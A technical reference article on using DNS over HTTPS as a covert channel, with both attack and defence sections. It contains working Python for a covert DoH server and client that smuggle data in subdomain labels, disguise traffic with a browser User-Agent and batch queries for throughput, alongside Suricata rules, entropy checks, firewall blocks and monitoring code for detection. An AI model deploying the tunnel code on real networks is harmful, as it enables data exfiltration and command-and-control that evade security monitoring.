DNS over HTTPS Tunneling

published: August 12, 2025

DNS over HTTPS (DoH) tunneling encapsulates DNS queries in HTTPS traffic on port 443, so the queries blend in with ordinary web traffic while providing an encrypted covert communication channel.

Technical Description

DoH (RFC 8484) carries DNS queries and responses in wire format inside HTTPS GET or POST requests. The protocol was designed to improve privacy, but the same encrypted transport can hide a covert channel: data embedded in DNS query names travels inside the HTTPS connection, where on-path monitoring cannot read it.

The technique works by:

  1. Encoding covert data as DNS query names
  2. Sending each query via HTTPS GET or POST to a DoH resolver
  3. Receiving encoded responses in the DNS answer section
  4. Reusing the HTTPS connection across queries for efficiency

Protocol Mechanics

DoH Query Formats

# GET method (the dns parameter is the base64url-encoded query; this value is
# the www.example.com example from RFC 8484)
GET /dns-query?dns=AAABAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1
Host: doh.example.com
Accept: application/dns-message

# POST method
POST /dns-query HTTP/1.1
Host: doh.example.com
Content-Type: application/dns-message
Content-Length: 33

[binary DNS query data]

Base64url Encoding

# DoH query encoding
import base64
import dns.message
import dns.rdatatype

def create_doh_query(domain_name):
    """create base64url encoded doh query"""

    # create dns query
    query = dns.message.make_query(domain_name, dns.rdatatype.A)

    # serialize to wire format
    wire_data = query.to_wire()

    # base64url encode for get parameter
    encoded = base64.urlsafe_b64encode(wire_data).decode().rstrip('=')

    return encoded

# example covert domain
covert_data = "secret123"
domain = f"{covert_data}.tunnel.example.com"
encoded_query = create_doh_query(domain)
print(f"doh query: {encoded_query}")
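The reverse direction is useful when reading proxy logs or debugging a resolver. The sketch below uses only the standard library to turn a `dns` GET parameter back into the queried name. The function names `decode_doh_param` and `read_qname` are illustrative, and the parser assumes a single uncompressed question, which is what a DoH query normally carries.

```python
import base64

def decode_doh_param(param: str) -> bytes:
    """Restore the stripped '=' padding and decode a base64url DoH parameter."""
    return base64.urlsafe_b64decode(param + "=" * (-len(param) % 4))

def read_qname(wire: bytes) -> str:
    """Read the first question name from a DNS message in wire format."""
    pos = 12  # the fixed DNS header is 12 bytes long
    labels = []
    while True:
        length = wire[pos]
        if length == 0:  # the zero-length root label ends the name
            break
        if length > 63:
            raise ValueError("compressed or invalid label")
        labels.append(wire[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    return ".".join(labels)

# Example query from RFC 8484 (asks for the A record of www.example.com)
wire = decode_doh_param("AAABAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB")
print(len(wire), read_qname(wire))
```

The 33-byte length matches the Content-Length a POST request would carry for the same query.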

Implementation: doh-proxy

Server Setup

# Build cloudflared from source
git clone https://github.com/cloudflare/cloudflared.git
cd cloudflared
make cloudflared

# Create a tunnel and route the DoH hostname to it
./cloudflared tunnel login
./cloudflared tunnel create doh-tunnel
./cloudflared tunnel route dns doh-tunnel doh.example.com

# Start the tunnel
./cloudflared tunnel --config config.yml run doh-tunnel

Configuration file:

# config.yml
tunnel: your-tunnel-id
credentials-file: /home/user/.cloudflared/your-tunnel-id.json

ingress:
  - hostname: doh.example.com
    # cloudflared does not accept a path in the service URL; the request
    # path (/dns-query) is passed through to the origin unchanged
    service: https://1.1.1.1
    originRequest:
      httpHostHeader: 1.1.1.1

  - service: http_status:404

Custom DoH Server

# Custom DoH server with covert channel support
from flask import Flask, request, Response
import base64
import dns.message
import dns.resolver
import dns.rrset

app = Flask(__name__)

# Covert data storage
covert_responses = {}

@app.route('/dns-query', methods=['GET', 'POST'])
def dns_query():
    if request.method == 'GET':
        # extract dns query from parameter
        dns_data = request.args.get('dns')
        if dns_data:
            # decode base64url
            padding = 4 - (len(dns_data) % 4)
            if padding != 4:
                dns_data += '=' * padding

            query_bytes = base64.urlsafe_b64decode(dns_data)
        else:
            return "no dns query provided", 400

    else:  # post method
        query_bytes = request.get_data()

    # parse dns query
    try:
        query = dns.message.from_wire(query_bytes)
        qname = str(query.question[0].name)

        # check for covert channel patterns
        if 'tunnel.example.com' in qname:
            # extract covert data from subdomain
            covert_data = qname.split('.')[0]
            print(f"received covert data: {covert_data}")

            # store response for later retrieval
            if covert_data not in covert_responses:
                covert_responses[covert_data] = f"response-{len(covert_responses)}"

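            # Create custom DNS response
            response_msg = dns.message.make_response(query)
            response_msg.answer.append(
                dns.rrset.from_text(qname, 300, 'IN', 'TXT',
                                  f'"{covert_responses[covert_data]}"')
            )
        else:
            # Forward legitimate queries. resolve() returns an Answer object;
            # its .response attribute holds the full DNS message.
            resolver = dns.resolver.Resolver()
            answer = resolver.resolve(qname, query.question[0].rdtype)
            response_msg = answer.response
            response_msg.id = query.id  # match the client's query ID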

        # return dns response
        response_data = response_msg.to_wire()

        resp = Response(response_data)
        resp.headers['content-type'] = 'application/dns-message'
        resp.headers['cache-control'] = 'max-age=300'

        return resp

    except Exception as e:
        return f"dns query error: {e}", 400

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=443, ssl_context='adhoc')

Client Implementation

# DoH covert channel client
import requests
import base64
import dns.message
import dns.rdatatype
import time

class dohcovertchannel:
    def __init__(self, doh_server):
        self.doh_server = doh_server
        self.session = requests.Session()

        # Set up a persistent connection
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'application/dns-message',
            'Cache-Control': 'no-cache'
        })

    def send_covert_data(self, data, domain_suffix="tunnel.example.com"):
        """send covert data via doh query"""

        # encode data in subdomain
        covert_domain = f"{data}.{domain_suffix}"

        # Create DNS query
        query = dns.message.make_query(covert_domain, dns.rdatatype.TXT)
        query_wire = query.to_wire()

        # method 1: post request
        response = self.session.post(
            f"{self.doh_server}/dns-query",
            data=query_wire,
            headers={'content-type': 'application/dns-message'},
            timeout=10
        )

        if response.status_code == 200:
            # parse dns response
            dns_response = dns.message.from_wire(response.content)

            # extract covert response
            if dns_response.answer:
                for answer in dns_response.answer:
                    if answer.rdtype == dns.rdatatype.TXT:
                        return str(answer[0]).strip('"')

        return None

    def send_covert_data_get(self, data, domain_suffix="tunnel.example.com"):
        """send covert data via doh get method"""

        covert_domain = f"{data}.{domain_suffix}"
        query = dns.message.make_query(covert_domain, dns.rdatatype.TXT)

        # base64url encode
        encoded_query = base64.urlsafe_b64encode(query.to_wire()).decode().rstrip('=')

        # get request
        response = self.session.get(
            f"{self.doh_server}/dns-query",
            params={'dns': encoded_query},
            timeout=10
        )

        if response.status_code == 200:
            dns_response = dns.message.from_wire(response.content)
            if dns_response.answer:
                for answer in dns_response.answer:
                    if answer.rdtype == dns.rdatatype.TXT:
                        return str(answer[0]).strip('"')

        return None

# usage example
client = dohcovertchannel("https://doh.example.com")

# send data
result = client.send_covert_data("secret123")
print(f"response: {result}")

# maintain persistent session
for i in range(10):
    data = f"message_{i}"
    response = client.send_covert_data(data)
    print(f"sent: {data}, received: {response}")
    time.sleep(1)

Traffic Characteristics

HTTPS Request Patterns

# Typical DoH GET request
GET /dns-query?dns=AAABAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1
Host: cloudflare-dns.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: application/dns-message
Accept-Encoding: gzip, deflate, br

# Typical DoH POST request
POST /dns-query HTTP/1.1
Host: cloudflare-dns.com
Content-Type: application/dns-message
Content-Length: 45
User-Agent: curl/7.68.0

[binary DNS data]

TLS Fingerprinting

# Analyze DoH traffic characteristics
from scapy.all import rdpcap, TCP
from scapy.layers.tls.all import TLS
import collections

def analyze_doh_traffic(pcap_file):
    packets = rdpcap(pcap_file)

    doh_connections = []
    for p in packets:
        if (p.haslayer(TCP) and p.haslayer(TLS) and
            p[TCP].dport == 443):

            # Look for DoH-specific patterns. The request path is encrypted,
            # so this match only fires on decrypted captures.
            if hasattr(p, 'load') and b'dns-query' in p.load:
                doh_connections.append(p)

    # analyze timing patterns
    if len(doh_connections) > 1:
        intervals = []
        for i in range(1, len(doh_connections)):
            interval = doh_connections[i].time - doh_connections[i-1].time
            intervals.append(interval)

        # regular intervals might indicate automated covert channel
        avg_interval = sum(intervals) / len(intervals)
        variance = sum((x - avg_interval)**2 for x in intervals) / len(intervals)

        if variance < 0.1:  # low variance = regular timing
            print("suspicious regular doh query pattern detected")

        # analyze query size distribution
        sizes = [len(p) for p in doh_connections]
        size_counts = collections.Counter(sizes)

        # consistent sizes might indicate encoding
        if len(size_counts) < 5:
            print("suspicious consistent doh query sizes")

analyze_doh_traffic('doh_traffic.pcap')
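An absolute variance threshold depends on the time unit and on how far apart the queries are, so a scale-free measure can be easier to tune. The following sketch is an alternative to the check above, not a replacement prescribed by any tool: it computes the coefficient of variation (standard deviation divided by mean) of the gaps between requests. The function name and the sample timestamps are assumptions chosen for illustration.

```python
import statistics

def timing_regularity(timestamps):
    """Return the coefficient of variation of inter-arrival gaps, or None."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 2:
        return None  # not enough data to judge
    mean = statistics.mean(gaps)
    if mean == 0:
        return None  # all requests share one timestamp
    return statistics.pstdev(gaps) / mean

# Synthetic data: a fixed one-second beacon versus bursty, browser-like lookups
beacon = [i * 1.0 for i in range(20)]
browsing = [0, 0.2, 0.3, 5.0, 5.1, 30.0, 30.4, 31.0, 90.0, 90.1]

print(timing_regularity(beacon))    # close to 0: very regular
print(timing_regularity(browsing))  # well above 1: irregular
```

Values near zero indicate machine-like regularity regardless of whether the interval is one second or one hour. A sender that adds random jitter raises the value, so this works best alongside the other indicators.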

Detection Methods

Traffic Indicators

  • High-frequency DoH queries from one client to a single resolver
  • Consistent query sizes, which suggest a fixed-length encoding
  • Queries for domains with high-entropy subdomains
  • Non-standard DoH servers or self-hosted resolvers
  • Regular timing intervals between queries
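The first indicator can be checked from proxy or flow logs without decrypting anything. Below is a minimal sketch, assuming each log entry is a dict with `src_ip`, `host`, and a numeric `timestamp` in seconds. The function name, the fixed 60-second buckets, and the threshold of 100 are illustrative choices, not values taken from a particular product.

```python
from collections import Counter

def peak_rate_per_resolver(entries, bucket_seconds=60):
    """Return {(src_ip, host): highest request count seen in any one time bucket}."""
    buckets = Counter()
    for e in entries:
        bucket = int(e["timestamp"] // bucket_seconds)
        buckets[(e["src_ip"], e["host"], bucket)] += 1
    peaks = {}
    for (src, host, _bucket), count in buckets.items():
        peaks[(src, host)] = max(peaks.get((src, host), 0), count)
    return peaks

# Synthetic log: one client sends 120 requests within a minute,
# another sends 3 requests spread over ten minutes
entries = [{"src_ip": "10.0.0.5", "host": "doh.example.com", "timestamp": 1200 + i * 0.5}
           for i in range(120)]
entries += [{"src_ip": "10.0.0.9", "host": "dns.google", "timestamp": t}
            for t in (1200, 1500, 1800)]

peaks = peak_rate_per_resolver(entries)
flagged = {key: n for key, n in peaks.items() if n > 100}
print(flagged)
```

Fixed buckets can split a burst across a boundary and undercount it. A sliding window avoids that at the cost of keeping per-source state.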

Detection Rules

# Suricata rules for DoH covert channels
alert tls any any -> any 443 ( \
    msg:"DoH covert channel - high frequency queries"; \
    tls.sni; content:"doh."; nocase; \
    threshold: type threshold, track by_src, seconds 60, count 100; \
    sid:1000030; rev:1; \
)

# Requires decrypted traffic: the URI is not visible inside TLS
alert http any any -> any 443 ( \
    msg:"DoH suspicious domain pattern"; \
    http.uri; content:"/dns-query"; \
    pcre:"/dns=[A-Za-z0-9_-]{20,}/"; \
    sid:1000031; rev:1; \
)

Entropy Analysis

# Detect high-entropy domains in DoH queries
import math
import base64
from collections import Counter
from urllib.parse import urlparse, parse_qs

import dns.message

def analyze_doh_queries(doh_logs):
    """Analyze DoH query logs for covert channels"""

    suspicious_domains = []

    for log_entry in doh_logs:
        if 'dns-query' in log_entry.get('url', ''):
            # Extract dns query parameter
            query_param = extract_dns_parameter(log_entry['url'])

            if query_param:
                try:
                    # Decode base64url DNS query
                    query_data = decode_dns_query(query_param)
                    domain = extract_query_name(query_data)

                    # Calculate subdomain entropy
                    subdomain = domain.split('.')[0]
                    entropy = calculate_entropy(subdomain)

                    if entropy > 4.5:  # high entropy threshold
                        suspicious_domains.append({
                            'domain': domain,
                            'entropy': entropy,
                            'timestamp': log_entry['timestamp'],
                            'source_ip': log_entry['src_ip']
                        })

                except Exception:
                    # Skip entries that do not decode to a valid DNS query
                    continue

    return suspicious_domains

def extract_dns_parameter(url):
    """Return the value of the dns= query parameter, or None if absent"""
    values = parse_qs(urlparse(url).query).get('dns')
    return values[0] if values else None

def extract_query_name(query_data):
    """Return the first question name from a wire-format DNS query"""
    query = dns.message.from_wire(query_data)
    return query.question[0].name.to_text(omit_final_dot=True)

def calculate_entropy(text):
    """Calculate Shannon entropy in bits per character"""
    if not text:
        return 0

    counts = Counter(text)
    probs = [count/len(text) for count in counts.values()]
    return -sum(p * math.log2(p) for p in probs)

def decode_dns_query(b64_query):
    """Decode base64url DNS query"""
    # Add padding if needed
    padding = 4 - (len(b64_query) % 4)
    if padding != 4:
        b64_query += '=' * padding

    return base64.urlsafe_b64decode(b64_query)
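A fixed entropy threshold interacts with label length and alphabet size, which is worth checking before relying on the 4.5 value above. Per-character Shannon entropy cannot exceed log2 of the number of distinct characters, so a label needs at least 23 distinct characters to score above 4.5, and hex-encoded data tops out at 4.0. The worked sketch below illustrates this; `shannon_entropy` mirrors the calculation above and `min_distinct_chars` is a hypothetical helper.

```python
import math
from collections import Counter

def shannon_entropy(text):
    """Shannon entropy in bits per character."""
    counts = Counter(text)
    return -sum((c / len(text)) * math.log2(c / len(text)) for c in counts.values())

def min_distinct_chars(threshold_bits):
    """Smallest number of distinct characters whose maximum entropy exceeds the threshold."""
    return math.floor(2 ** threshold_bits) + 1

print(min_distinct_chars(4.5))                          # 23
print(round(shannon_entropy("secret123"), 2))           # 2.95
print(shannon_entropy("0123456789abcdef" * 4))          # 4.0 (hex alphabet ceiling)
```

Under these bounds, short labels and hex-encoded payloads never cross 4.5, so a lower threshold combined with a minimum label length may detect more. Any replacement value should be validated against real query logs.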

Countermeasures

Network Level Blocking

# Allow only approved DoH providers. Rules are evaluated in order, so the
# ACCEPT rules must come before the DROP rule.
iptables -A FORWARD -d 1.1.1.1 -p tcp --dport 443 -j ACCEPT  # Cloudflare
iptables -A FORWARD -d 8.8.8.8 -p tcp --dport 443 -j ACCEPT  # Google

# Drop other port-443 traffic containing "dns-query". The string match needs
# --algo and only sees unencrypted payloads, so it cannot match inside TLS.
iptables -A FORWARD -p tcp --dport 443 -m string --string "dns-query" --algo bm -j DROP

DNS Policy Enforcement

# Redirect all DNS to internal resolver
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 192.168.1.1:53
iptables -t nat -A PREROUTING -p tcp --dport 53 -j DNAT --to-destination 192.168.1.1:53

# Block DoH at proxy level
# Squid configuration
acl doh_domains dstdomain .cloudflare-dns.com .dns.google
http_access deny doh_domains

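Enterprise Monitoring

# Enterprise DoH monitoring system
import asyncio
import base64
import math
import time
from collections import Counter, defaultdict, deque
from datetime import datetime
from urllib.parse import urlparse, parse_qs

import dns.message

class dohmonitor:
    def __init__(self, allowed_resolvers, window=60, max_queries=100):
        self.allowed_resolvers = set(allowed_resolvers)
        self.suspicious_patterns = []
        self.window = window            # seconds
        self.max_queries = max_queries  # per source within the window
        self.request_times = defaultdict(deque)

    async def monitor_doh_traffic(self, proxy_logs):
        """Monitor DoH traffic through corporate proxy"""

        for entry in proxy_logs:
            if self.is_doh_request(entry):
                await self.analyze_doh_request(entry)

    def is_doh_request(self, log_entry):
        """Identify DoH requests"""
        url = log_entry.get('url', '')
        return 'dns-query' in url or 'application/dns-message' in log_entry.get('content_type', '')

    async def analyze_doh_request(self, entry):
        """Analyze individual DoH request"""
        host = entry.get('host', '')

        # Check if resolver is approved (exact match; a substring test would
        # let "1.1.1.1" approve a host such as "11.1.1.10")
        if host not in self.allowed_resolvers:
            self.flag_suspicious_activity(entry, "unapproved DoH resolver")

        # Check query frequency
        if self.check_high_frequency(entry):
            self.flag_suspicious_activity(entry, "high frequency queries")

        # Check domain entropy
        if await self.check_domain_entropy(entry):
            self.flag_suspicious_activity(entry, "high entropy domain")

    def check_high_frequency(self, entry):
        """Return True when a source exceeds max_queries within the window"""
        # Assumes 'timestamp' is in epoch seconds; falls back to the current time
        now = entry.get('timestamp', time.time())
        times = self.request_times[entry.get('src_ip')]
        times.append(now)
        while times and now - times[0] > self.window:
            times.popleft()
        return len(times) > self.max_queries

    async def check_domain_entropy(self, entry, threshold=4.5):
        """Return True when the first label of the queried name has high entropy"""
        values = parse_qs(urlparse(entry.get('url', '')).query).get('dns')
        if not values:
            return False  # POST bodies do not appear in URL logs
        try:
            raw = base64.urlsafe_b64decode(values[0] + '=' * (-len(values[0]) % 4))
            label = dns.message.from_wire(raw).question[0].name.to_text().split('.')[0]
        except Exception:
            return False
        if not label:
            return False
        counts = Counter(label)
        entropy = -sum(c / len(label) * math.log2(c / len(label)) for c in counts.values())
        return entropy > threshold

    def flag_suspicious_activity(self, entry, reason):
        """Flag suspicious DoH activity"""
        alert = {
            'timestamp': datetime.now(),
            'source_ip': entry.get('src_ip'),
            'host': entry.get('host'),
            'reason': reason,
            'entry': entry
        }

        self.suspicious_patterns.append(alert)
        print(f"DoH alert: {reason} from {entry.get('src_ip')}")

# Usage
monitor = dohmonitor(['1.1.1.1', '8.8.8.8', 'dns.quad9.net'])
# asyncio.run(monitor.monitor_doh_traffic(proxy_logs))  # proxy_logs: iterable of log-entry dicts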

Advantages and Limitations

Advantages

  • Traffic is hard to distinguish from ordinary HTTPS by content alone
  • Encryption prevents inspection of query contents on the wire
  • Port 443 is rarely blocked
  • Legitimate DoH usage provides cover
  • Supports both GET and POST methods
  • Persistent HTTPS connections improve performance

Limitations

  • Requires control of a DoH resolver or a man-in-the-middle (MITM) position
  • Detection remains possible through traffic analysis (timing, volume, query sizes)
  • Limited by DNS query/response size constraints
  • Some networks block all DoH traffic
  • Higher latency than direct DNS
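The size constraint can be made concrete with a little arithmetic. A DNS name is limited to 253 characters in text form (255 octets on the wire) and each label to 63 characters. The sketch below estimates how many raw bytes fit in one query name, assuming unpadded base32 encoding (5 bits per character). The function name and the base32 assumption are illustrative and do not describe any particular tool.

```python
MAX_NAME_TEXT = 253  # maximum name length in text form (255 octets on the wire)
MAX_LABEL = 63       # maximum length of a single label

def max_payload_bytes(suffix: str) -> int:
    """Upper bound on raw bytes per query name when data labels are base32 text."""
    # Characters left of the suffix, after the dot that joins them to it
    budget = MAX_NAME_TEXT - len(suffix) - 1
    # Every label costs its length plus one separating dot
    full_labels, rest = divmod(budget + 1, MAX_LABEL + 1)
    data_chars = full_labels * MAX_LABEL + max(rest - 1, 0)
    return data_chars * 5 // 8  # base32 carries 5 bits per character

print(max_payload_bytes("tunnel.example.com"))  # 144
```

At roughly 144 bytes per query for this suffix, sustained transfer requires many queries, which is part of why volume and frequency are useful detection signals.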

Performance Characteristics

Bandwidth Comparison

Method            Bandwidth      Latency       Detection Risk
DoH GET           50-100 kb/s    +50-100 ms    Medium
DoH POST          100+ kb/s      +20-50 ms     Medium
Traditional DNS   Variable       Baseline      High
HTTPS tunnel      Mbps           +10-30 ms     Low

Optimization Techniques

# Optimize DoH covert channel performance
import requests
from requests.adapters import HTTPAdapter

# Subclasses the client shown earlier so that send_covert_data is available
class optimizeddohchannel(dohcovertchannel):
    def __init__(self, doh_server):
        self.doh_server = doh_server
        self.session = self.create_optimized_session()

    def create_optimized_session(self):
        """Create optimized HTTP session"""
        session = requests.Session()

        # Connection pooling
        adapter = HTTPAdapter(
            pool_connections=10,
            pool_maxsize=10,
            max_retries=3
        )
        session.mount('https://', adapter)

        # persistent headers
        session.headers.update({
            'connection': 'keep-alive',
            'accept-encoding': 'gzip, deflate, br',
            'user-agent': 'mozilla/5.0 (legitimate browser string)'
        })

        return session

    def batch_queries(self, data_chunks):
        """Send multiple queries in parallel"""
        import concurrent.futures

        with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
            futures = [
                executor.submit(self.send_covert_data, chunk)
                for chunk in data_chunks
            ]

            results = []
            for future in concurrent.futures.as_completed(futures):
                results.append(future.result())

        return results

Real-World Usage

Documented Cases

  • Corporate bypasses: employees circumventing DNS filtering
  • Malware families: using DoH for C2 communication
  • Privacy tools: legitimate DoH usage for DNS privacy
  • Research projects: academic covert channel studies

Threat Actor Adoption

  • Increasing use in APT campaigns
  • Integration with commercial malware frameworks
  • Focus on evading DNS-based security controls

Testing Setup

Lab Environment

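# Set up a local DoH server. The doh-proxy package provides doh-httpproxy,
# which serves plain HTTP and is meant to sit behind a TLS-terminating proxy.
pip install doh-proxy
doh-httpproxy --upstream-resolver 8.8.8.8 --listen-address 127.0.0.1 --port 8080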

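# Generate a test DNS query in wire format (requires dnspython)
python3 -c "import sys, dns.message; sys.stdout.buffer.write(dns.message.make_query('example.com', 'A').to_wire())" > query.bin

# Test client
curl -H "Content-Type: application/dns-message" \
  --data-binary @query.bin \
  -o response.bin \
  http://127.0.0.1:8080/dns-query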

Docker Environment

# DoH test environment
FROM python:3.9-slim

# cryptography is needed for Flask's ssl_context='adhoc'
RUN pip install flask dnspython requests cryptography

COPY doh_server.py /app/
COPY doh_client.py /app/

WORKDIR /app

EXPOSE 443

CMD ["python", "doh_server.py"]

References

  • RFC 8484: DNS Queries over HTTPS (DoH)
  • RFC 8310: Usage Profiles for DNS over TLS and DNS over DTLS
  • “DNS over HTTPS Considerations” - IETF DoH Working Group
  • “Detecting Malicious DoH Traffic” - SANS Institute
  • Cloudflare DoH documentation